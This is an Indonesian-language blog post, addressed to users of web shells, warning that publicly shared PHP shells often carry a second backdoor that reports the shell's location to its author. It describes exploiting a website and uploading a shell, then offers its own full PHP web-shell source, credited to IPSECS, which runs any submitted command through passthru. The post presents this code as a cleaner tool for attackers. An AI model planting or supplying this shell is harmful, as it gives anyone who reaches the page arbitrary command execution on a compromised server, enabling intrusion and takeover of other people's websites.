Hati-hati terhadap Backdoor yang di-backdoor!

Cuma ingin meneruskan lidah saja dari empunya IPSECS, “who owns who?”.
Hati-hati ya kawan-kawan bagi pecinta web-shell, php-shell atau jenis-jenis shell lainnya yang “tersebar” luas di internet. Karena tidak jarang didalam shell (baca: backdoor) tersebut ditanami backdoor lagi.

Mau bukti?

Coba deh teliti dulu setiap shell yang kita dapat dari internet. Apa bener disana gak ada backdoor’a lagi? Apa seh maksudnya?

Logikanya begini secara sistematis :
– Saya exploitasi web “A” dan memasang shell yang didapat dari web “B”.
– Lalu saya upload shell’a di dalam web “A”, dan muncullah link http://A.com/shell.php
– Dengan ketidaktahuan saya, ternyata kalau shell itu dipakai akan mengirimkan log ke sebuah email milik web “B” yang isinya url shell tadi.
– Ternyata si B tidak usah capek² mengupload shell, karena sudah diupload-kan oleh saya. hahahaha.
– Saya capek² mengupload’a, eh ujung²nya si “B” yang take-over semuanya. Nasiib.

Paham kan? Bagaimana solusinya? Ya coding sendiri lah! Ini ada source-code dari IPSECS

<html>
<pre>
- Backdoor Web Shell -
<form method="POST" action="<?php $_SERVER['PHP_SELF'] ?>" >
<table>
<tr>
 <td>Command : </td>
 <td>&nbsp;&nbsp;&nbsp; </td>
 <td><input type="text" name="command"></td>
</tr>
<tr>
 <td>&nbsp;&nbsp;&nbsp;</td>
 <td>&nbsp;&nbsp;&nbsp;</td>
 <td><input type="submit" value="execute!"></td>
</tr>
</table>
</form>
<?php
if(isset($_POST['command'])){
 echo "Executing "" . $_POST['command'] . ""<BR/>\n";
 if(!empty($_POST['command'])){
  passthru($_POST['command']);
 }else{
  echo "You cannot execute blank command!<BR/>\n";
 }
}
?>
</pre>
</html>